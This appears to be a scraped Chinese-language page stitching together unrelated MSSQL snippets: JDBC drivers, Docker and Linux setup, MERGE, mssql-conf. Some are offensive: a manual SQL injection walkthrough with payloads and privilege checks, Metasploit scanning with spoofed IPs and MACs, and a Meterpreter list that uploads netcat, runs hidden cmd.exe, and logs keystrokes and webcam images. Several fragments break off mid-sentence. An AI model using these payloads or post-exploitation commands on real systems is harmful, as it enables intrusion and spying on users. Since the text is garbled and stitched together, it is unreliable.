mssql

Java连接SQL Server 2000数据库时，有两种方法： （1）通过Microsoft的JDBC驱动连接。此JDBC驱动共有三个文件，分别是mssqlserver.jar、msutil.jar和msbase.jar。但是Microsoft官网上已经找不到这些驱动，其提供的sqljdbc.jar和sqljdbc4.jar并不支持SQL Server 2000。 驱动程序名称： com.microsoft.jdbc.sqlserver.SQLServerDriver （即下面的 classforname ） 数据库连接URL： jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=dbname （即下面的 url ） （2）通过jTDS驱动连接。下载地址： http://sourceforge.net/projects/jtds/files/jtds/ 驱动程序名称： net.sourceforge.jtds.jdbc.Driver （即下面的 classforname ） 数据库连接URL： jdbc:jtds:sqlserver://localhost:1433/dbname （即下面的 url ） 采用第二种方法连接时，可能报错： java.lang.UnsupportedClassVersionError: net

一、手工注入 Step1：检测注入点 　　通过payload检测 　　http://……/less-1.asp?id=1' and 1=1-- 　　http://……/less-1.asp?id=1' and 1=2-- Step2：判断数据库类型 　　select * from sysobjects （sysobjects 系统对象表，保存当前数据库的对象） 　　select * from users where id=1 and exists(select * from sysobjects) 有结果说明该数据库是mssql 　　http://……/less-1.asp?id=1' union select * from users where id=1 and exists(select * from sysobjects)-- Step3：注入点权限的判断（根据页面显示效果） 　　select IS_SRVROLEMEMBER('sysadmin'); 判断当前是否为sa 　　http://……/less-1.asp?id=1' and (select IS_SRVROLEMEMBER('sysadmin'))>0-- 　　select is_srvrolemember('db_owner'); 判断当前用户写文件、读文件的权限（db_owner） 　　http://……

MSF系列： MSF――基本使用和Exploit模块（一） MSF――Payload模块（二） MSF――Meterpreter（三） MSF――信息收集（四） 发现和端口扫描 Nmap扫描 db_nmap -sV 192.168.1.0/24 Auxiliary模块 RHOSTS在指定目标时可以指定多个目标 指定IP范围：192.168.171.1.20-192.168.171.30 指定两个主机段：192.168.1.0/24,192.168.11.0/24 导入文件中的IP：file:/rooot/host.txt search arp arp扫描 INTERFACE可以指定使用哪个网卡发包，SHOST可以伪装成别的IP，SMAC可以伪装成别的MAC地址，THREADS设置扫描的线程数 search portscan 端口扫描有以下几个模块，我们这里用syn扫描 步骤都差不多，show options查看要填写的参数信息，然后run运行 IPID Idle扫描 向一个空闲主机发包，这个空闲主机必须要有一个特点，它的IP包头里的ID值是顺序增长的，假如发给它第一个包的响应ID是1，下一次响应的ID就是2 根据它这个变化的IPID的值，伪装扫描的源IP地址，把源IP改成目标的IP，以目标IP为源IP向这个空闲主机发包，根据这个ID的值判断目标主机是否活着，目标端口是否开放

docker pull microsoft/mssql-server-linux docker run -e "ACCEPT_EULA=Y" -e "SA_PASSWORD=Pass@Word1" -p 1433:1433 --name mssql -d microsoft/mssql-server-linux 连接navicat后, 执行语句创建数据库 CREATE DATABASE test go 来源：博客园 作者： twfb 链接：https://www.cnblogs.com/edhg/p/11530901.html

... STP1. 开启Server>Facets>SurfaceAreaConfiguration>AdHocRemoteQueriesEnabled, 若未开启错误消息如下, Msg 15281, Level 16, State 1, Line 1 SQL Server blocked access to STATEMENT 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'Ad Hoc Distributed Queries' by using sp_configure. For more information about enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in SQL Server Books Online. sp_configure 'show advanced options',1; GO

ժҪ: 下文讲述MSSQL中，插入数据时，如果存在则更新,否则就插入数据的方法分享 实验环境:sql server 2017 mssql中，我们可以采用 MERGE INTO 关键字实现此功能， 当两者匹配成功，则运行***语句，否则运行其它语句，达到插入数据时的判断操作， 具体操作方法如下所示: create table [ maomao365 . com ] ( keyId int identity , info varchar ( 80 ) ) go insert into [ maomao365 . com ] ( info ) values ( 'sqlblog' ), ( 'sqlserver' ),( 'maomao365.com' ) --- merge into 实现如果存在，则更新 ---如果不存在，则删除 MERGE INTO [ maomao365 . com ] a USING ( SELECT 2 AS keyId_B , 'other' AS info_B ) b ON ( a . keyId = b . keyId_B ) WHEN MATCHED THEN UPDATE SET a . info = b . info_B --更新 WHEN NOT MATCHED THEN INSERT ( info ) VALUES ( b . info_B )

mssql-conf是在Linux上安装SQL Server 2017后的一个配置脚本。你可以使用这个实用工具设置以下参数： Agent 启用SQL Server代理 Collation 设置一个新的排序规则 Customer feedback 选择是否发送反馈给微软 Database Mail Profile 设置默认数据库邮件配置 Default data directory 修改新的数据文件的默认路径 Default log directory 修改新的日志文件的默认路径 Default master database file directory 修改master数据库的默认路径 Default master database file name 修改master数据库文件的名字 Default dump directory 修改新的内存DUMP和其他排错文件的默认路径 Defalut error log directory 修改新的SQL Server错误日志文件、默认跟踪、系统健康会话扩展事件和Hekaton会话扩展事件文件 Default backup directory 修改新的备份文件的默认路径 Dump type 选择内存DUMP文件收集的DUMP类型 High availability 启用可用性组 Local Audit directory

有客户使用Linux服务器，SQL Server从2017开始已支持Linux，从未用过，今天测试了一下，比较简单，记录一下。 Linux:CentOS 7.0 首先更新源： curl -o /etc/yum.repos.d/mssql-server.repo https://packages.microsoft.com/config/rhel/7/mssql-server-2017.repo 然后安装： yum install -y mssql-server 安装完后配置： /opt/mssql/bin/mssql-conf setup 好了，就这么简单！ 然后测试从windows sql server 2008 R2迁移至Linux SQL Server 2017下。 首先在windows下备份数据库，比如是a.bak,将备份文件上传至Linux。Linux默认数据路径是/var/opt/mssql/data。然后在Linux下运行命令： RESTORE DATABASE newdbname FROM DISK = '/var/opt/mssql/data/a.bak' WITH MOVE 'db1' TO '/var/opt/mssql/data/newdb.mdf', MOVE 'db1_log' TO '/var/opt/mssql/data/newdb_log.ldf'

SELECT STUFF( (SELECT ';' + name FROM tbtable WHERE id='88799089-076A-4E96-9D0A-7CFD72CF3D08' FOR XML PATH('') ),1, 1, '') 来源： https://www.cnblogs.com/zengtianli/p/11672450.html

09.23 - 09.26|Xianyu233 2019/9/26 一个普通人的爱好 # OSI 七层网络模型 OSI七层网络模型 tcp/ip四层概念模型 对应的网络协议 应用层 应用层 HTTP FTP DNS 表示层 会话层 传输层 传输层 TCP UDP SCTP RTP 网络层 网络层 IP ARP RARP ICMP IGMP 数据链路层 网络接口层 物理层 # Msfconsole 使用笔记 Mestaploit是一款开源的安全漏洞漏洞检测工具 # 常用命令 background //处于后台 session -i index //与会话进行交互 quit //推出会话 shell //获得控制台权限 upload /root/Desktop/netcat.exe c:\\ //上传文件到目标 download nimeia.txt /root/Desktop //下载文件到本机 execute -H -i -f cmd.exe //创建新进程cmd.exe sysionfo //查看目标系统信息 shutdown //关机 keyscan_start //开启键盘记录 keyscan_dump //提取键盘记录 keyscan_stop //关闭键盘记录 webscam_snap //从指定的摄像头拍摄照片 # 可以利用的模块 445 端口 : exploit